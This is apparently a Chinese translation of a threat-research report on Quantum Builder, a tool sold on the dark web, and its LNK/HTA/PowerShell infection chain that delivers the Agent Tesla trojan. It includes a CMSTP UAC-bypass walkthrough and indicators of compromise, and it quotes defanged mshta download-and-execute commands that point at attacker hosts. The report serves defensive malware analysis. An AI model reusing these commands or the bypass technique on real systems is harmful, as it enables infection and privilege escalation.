Zscaler 的研究人員發(fā)現(xiàn)暗網(wǎng)上正在出售名為 Quantum Builder 的構(gòu)建工具，該工具可以投遞 .NET 遠(yuǎn)控木馬 Agent
Tesla。與過(guò)去的攻擊行動(dòng)相比，本次攻擊轉(zhuǎn)向使用 LNK 文件。

Quantum Builder 能夠創(chuàng)建惡意文件，如 LNK、HTA 與 PowerShell，最后投遞 Agent Tesla。攻擊者使用復(fù)雜的技術(shù)來(lái)生成
Payload：

使用 CMSTP 繞過(guò)用戶賬戶控制，以便以管理權(quán)限執(zhí)行最終 Payload 并關(guān)閉 Windows Defender

利用集成了無(wú)文件攻擊等多種攻擊向量的多階段感染鏈

在內(nèi)存中執(zhí)行 PowerShell 腳本以進(jìn)行逃避檢測(cè)

打開(kāi)誘餌分散受害者的注意力

后文對(duì)感染鏈進(jìn)行了深入分析，并對(duì) Quantum Builder 生成的 Payload 進(jìn)行了比較。

感染鏈

感染鏈?zhǔn)加隰~(yú)叉郵件，其中包含一個(gè)攜帶 GZIP 文檔的 LNK 文件。執(zhí)行 LNK 文件后，嵌入的 PowerShell 代碼會(huì)生成 MSHTA
來(lái)執(zhí)行遠(yuǎn)程服務(wù)器上的 HTA 文件。

感染鏈

HTA 文件解密 PowerShell 腳本，在執(zhí)行 AES 解密和 GZIP 解壓縮后解密并加載另一個(gè) PowerShell 腳本。解密后的
PowerShell 腳本是一個(gè) Downloader，通過(guò)遠(yuǎn)程服務(wù)器下載 Agent Tesla，再使用 CMSTP 繞過(guò) UAC 以管理權(quán)限執(zhí)行。

技術(shù)分析

魚(yú)叉郵件的主題為訂單確認(rèn)，如下所示：

魚(yú)叉郵件

郵件帶有一個(gè) GZIP 文件作為附件，與帶有 PDF 圖標(biāo)的惡意 LNK 文件捆綁在一起。執(zhí)行后 LNK 文件會(huì)運(yùn)行混淆的 PowerShell 代碼，經(jīng)過(guò)
base64 解編碼與異或解密得到執(zhí)行命令 IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/ordr[.]hta。

執(zhí)行混淆代碼

通過(guò)
MSHTA 執(zhí)行遠(yuǎn)程服務(wù)器上的 HTA 文件

HTA 文件包含多個(gè)千余行的垃圾 VBS 函數(shù)，其中只有一個(gè)與惡意行為有關(guān)。

HTA
主要函數(shù)

解密出來(lái)的 PowerShell 腳本如下所示：

解密
PowerShell 代碼

解密完成后，惡意函數(shù)就會(huì)通過(guò) CreateObject() 創(chuàng)建一個(gè) Wscript.Shell 對(duì)象，然后通過(guò) Run 方法執(zhí)行解密后的
PowerShell 腳本。

PowerShell
代碼執(zhí)行

解密的代碼以隱藏窗口的形式執(zhí)行，解密后會(huì)獲取另一個(gè) PowerShell 代碼。

執(zhí)行新的
PowerShell 代碼

IEX 函數(shù)執(zhí)行 AES 解密與 GZIP 解壓是關(guān)鍵的 PowerShell 代碼：

從遠(yuǎn)程服務(wù)器下載 Agent Tesla 的 Payload

執(zhí)行 CMSTP 繞過(guò) UAC

通過(guò)操作文件屬性隱藏 Agent Tesla

Agent Tesla 被硬編碼命名為 MuUQDuaFNoGmHQE.exe，并且被最終執(zhí)行：

解密
PowerShell 代碼

解密可獲取 Agent Tesla 的部署地址：

URL
解密

下載
Agent Tesla

通過(guò) WriteAllBytes() 函數(shù)寫(xiě)入磁盤(pán)，路徑為
C:\Users\<username>\AppData\Roaming\MuUQDuaFNoGmHQE.exe：

寫(xiě)入指定位置

Agent Tesla 二進(jìn)制文件的路徑作為參數(shù)傳遞給 PowerShell 腳本中的 CMSTP UAC Bypass
函數(shù)。該函數(shù)最初解碼一個(gè)特別大的、base64 編碼的數(shù)據(jù)塊，如下所示：

CMSTP
UAC Bypass

解碼后的代碼是基于 PowerShell 的 CMSTP UAC Bypass PoC，在
[GitHub](https://github.com/tylerapplebaum/CMSTP-
UACBypass/blob/master/UACBypassCMSTP.ps1)上也能夠找到?；?PowerShell 的 CMSTP UAC 繞過(guò)
PoC 腳本在執(zhí)行時(shí)會(huì)在 Temp 目錄中寫(xiě)入惡意 INF 文件，其中 PowerShell 腳本中的 $CommandToExecute變量是
Agent Tesla 二進(jìn)制文件的路徑。

惡意
INF 文件

將 INF 文件寫(xiě)入臨時(shí)目錄后，PowerShell 代碼會(huì)生成一個(gè)新進(jìn)程 cmstp.exe，并以 /au $InfFileLocation作為參數(shù)，然后安裝惡意 INF 文件，如下所示：

惡意
INF 文件作為參數(shù)執(zhí)行 CMSTP

在 cmstp.exe 安裝 INF 文件時(shí)，RunPreSetupCommandsSection 參數(shù)中的命令將以管理權(quán)限執(zhí)行。該腳本將 [ENTER]
按鍵發(fā)送到活動(dòng)的窗口應(yīng)用程序，以便使用 SendKeys.SendWait() 函數(shù)自動(dòng)執(zhí)行。

觸發(fā)
UAC 繞過(guò)

當(dāng)以惡意 INF 作為參數(shù)生成 cmstp.exe 時(shí)，就會(huì)以管理權(quán)限執(zhí)行惡意軟件，如下所示：

UAC
繞過(guò)并以管理權(quán)限執(zhí)行

Agent Tesla 的 C&C 服務(wù)器被配置為：

配置信息

C&C 通信如下所示：

C&C
通信

PowerShell 代碼還通過(guò)操作隱藏文件屬性來(lái)隱藏 Agent Tesla 二進(jìn)制文件，如下所示：

隱藏文件

攻擊變化

感染鏈的另一個(gè)變種，LNK 文件被捆綁在 ZIP 壓縮包中。通過(guò)命令 Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta來(lái)執(zhí)行遠(yuǎn)程 HTA
文件。通過(guò)將整數(shù)轉(zhuǎn)換為字符然后替換空格并進(jìn)一步利用 MSHTA 從遠(yuǎn)程 URL 執(zhí)行 HTA 文件，如下所示。

通過(guò)
LNK 執(zhí)行 HTA 文件

MSHTA 執(zhí)行的 HTA 文件與之前感染鏈中使用的文件相同，加密數(shù)組轉(zhuǎn)換為字符以形成可通過(guò) Run 方法執(zhí)行的 PowerShell 代碼。

HTA
文件解密 PowerShell 代碼

除了 Run() 方法之外，在某些情況下，HTA 文件利用 ShellExecute() 方法執(zhí)行 PowerShell 代碼，如下所示：

通過(guò)
ShellExecute() 執(zhí)行代碼

下載落地后，使用 Start-Process() 從 AppData 路徑執(zhí)行 Agent Tesla。如果 Payload 的擴(kuò)展名為
.dll，則它使用 rundll32.exe 將 DLL 加載到虛擬內(nèi)存中。

通過(guò)解密的
PowerShell 代碼下載并執(zhí)行 Agent Tesla

在某些情況下，還會(huì)有在內(nèi)存中解密的 PowerShell 代碼。代碼使用 Invoke-Item
函數(shù)下載并執(zhí)行了一個(gè)誘餌文件，以此來(lái)分散受害者的注意力，如下所示：

誘餌執(zhí)行

C&C 服務(wù)器的配置為：

配置信息

C&C 通信如下所示：

C&C
通信

Quantum

這些惡意文件都是由名為 Quantum Builder 的構(gòu)建工具創(chuàng)建的，如下所示：

Quantum
Builder

HTA 生成工具

HTA 生成工具如下所示：

HTA
生成工具

用戶輸入傳遞給 HTA Builder 函數(shù)以構(gòu)造 HTA 文件，如下所示：

HTA
生成工具

將此代碼與之前分析的 HTA 代碼比較，可以確定 Payload 是由 Quantum Builder 生成的。

在野
HTA 文件

LNK 生成工具

LNK 生成工具如下所示：

LNK
生成工具

快捷方式的構(gòu)造參數(shù)有 Description、IconLocation、Target Path、Arguments 和 WindowStyle，如下所示：

LNK
生成工具

將此代碼與之前分析的 LNK 代碼比較，可以確定 Payload 是由 Quantum Builder 生成的。

在野
LNK 文件

LNK 構(gòu)建工具還可以生成 ISO 文件的 Payload，如下所示：

ISO
生成工具

Quantum Builder 已被攻擊者多次利用，部署了多個(gè)惡意軟件家族：

RedLine Stealer

IcedID

GuLoader

RemcosRAT and AsyncRAT

結(jié)論

攻擊者會(huì)不斷更新技術(shù)手段，利用各種惡意軟件進(jìn)行攻擊。本次使用的 Agent Tesla 是最新的，Quantum Builder
已經(jīng)被應(yīng)用在各種攻擊活動(dòng)中投遞各種惡意樣本。

IOC

3edfa0cf3b7d54c24013e4f0019dba20
bb914889d5edc6b56c666d2e44e1a437
1adc0bd494cd42578ac8c8e726d5ad92
31c341ad31224cc7d38a5c4e80ccb727
f931773a226809669cad91410a57267f
d9433faddcaca526b26f713e27e2505f
213ada506251c477480bd14ea5507bf3
0ebb9d422f8e86458d8fa7f66fe1d0f1
563fda5da81a5e7818d771222e81f6c4
filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta
filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta
179[.]43[.]175[.]187/puao/PAYMENT[.]hta
179[.]43[.]175[.]187/puao/PO-M6888722[.]hta
filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe
179[.]43[.]175[.]187/puao/PAYMENTS[.]exe
179[.]43[.]175[.]187/puao/PO-M6888757[.]exe
mail[.]thesharpening.com[.]au
ftp[.]qurvegraphics[.]com

最后

對(duì)于從來(lái)沒(méi)有接觸過(guò)網(wǎng)絡(luò)安全的同學(xué)，我們幫你準(zhǔn)備了詳細(xì)的學(xué)習(xí)成長(zhǎng)路線圖。可以說(shuō)是最科學(xué)最系統(tǒng)的學(xué)習(xí)路線，大家跟著這個(gè)大的方向?qū)W習(xí)準(zhǔn)沒(méi)問(wèn)題。

同時(shí)每個(gè)成長(zhǎng)路線對(duì)應(yīng)的板塊都有配套的視頻提供：


當(dāng)然除了有配套的視頻，同時(shí)也為大家整理了各種文檔和書(shū)籍資料&工具，并且已經(jīng)幫大家分好類了。

因篇幅有限，僅展示部分資料，有需要的小伙伴，可以【掃下方二維碼】免費(fèi)領(lǐng)取：